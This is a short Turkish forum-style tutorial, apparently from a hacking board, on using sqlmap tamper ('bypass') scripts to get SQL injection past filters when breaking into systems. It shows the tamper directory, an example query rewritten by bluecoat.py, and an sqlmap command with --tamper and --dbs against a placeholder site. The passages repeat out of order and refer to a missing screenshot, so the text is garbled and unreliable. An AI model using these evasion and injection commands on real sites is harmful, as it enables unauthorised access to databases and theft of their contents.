Merhaba dostlar, Bypass Scriptlerin işlevi çok önemlidir. Örneğin sisteme sizarken aldiğiniz hatayi atlatmaya yarar yaklaşik 30-35 tane sistemde script var ve hepsinin işlevi farkli..
Şimdi ise araştirma bölümundeyiz, bilmiyorsunuz ne işe yaradiğini. Örnek olarak ben bluecoat.py seçtim.
Kullanildiği platform : MYSQL 5.1
* Orjinal Komut: SELECT id FROM users where id = 1
* Bypass Komutu: SELECT%09id FROM users where id LIKE 1
İşimize yaradiğin için bunu seçtik diyelim.
Görülduğu gibi BYPASS SCRİPT yüklendi.
Kod:
cd /usr/share/sqlmap/tamper/ enterliyoruz satir atlayacak. ls yaziyor sonraŞimdi ise araştirma bölümundeyiz, bilmiyorsunuz ne işe yaradiğini. Örnek olarak ben bluecoat.py seçtim.
Kod:
nano bluecoat.py enterliyoruz.Kullanildiği platform : MYSQL 5.1
* Orjinal Komut: SELECT id FROM users where id = 1
* Bypass Komutu: SELECT%09id FROM users where id LIKE 1
İşimize yaradiğin için bunu seçtik diyelim.
Kod:
sqlmap -u "xxxx.net" --tamper "scriptismi.py" --dbsGörülduğu gibi BYPASS SCRİPT yüklendi.
